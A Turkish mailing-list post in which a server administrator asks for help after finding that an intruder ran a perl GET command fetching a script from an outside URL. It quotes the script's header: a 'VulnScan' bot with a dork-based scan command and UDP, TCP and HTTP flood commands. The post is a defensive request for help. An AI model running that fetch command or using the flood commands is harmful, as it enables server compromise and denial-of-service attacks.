[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

rootkit mi?



Merhaba

 

Geçen sunucumuzda bir şey keşfettim birisi bir şekilde

 

/usr/bin/perl -w /usr/bin/GET http://www.j-vision.co.kr/company/mild/donad.txt

 

Komutunu çalıştırmıştı. Donad.txt nin başında birkaç satır:

 

#!/usr/bin/perl

# VulnScan v10 By dead

# Scan Command :!ok @scan 500 index.php?hasil= inurl:"index.php?hasil="+site:id

 

 

# DDoS commands :

# Udp : !ok @udpflood IP packet-size time

# Tcp : !ok @tcpflood IP port time

# Http: !ok @httpflood www.website.com time

 

 

Sorularım şunlar:

 

1.       Bu dosya nedir? Ne işe yarar? Bu çalışında httpds diye bi süreç başlıyor be apache susuyor.

2.       Bunu nasıl engellerim?

3.       Sunucumuzu profesyonel bir gözden geçirmek için önereceğiniz firmalar var mı? Ücreti mukabil kiminle görüşebilirim?

 

Herkese kolay gele.

 

MBÜ


Reply to: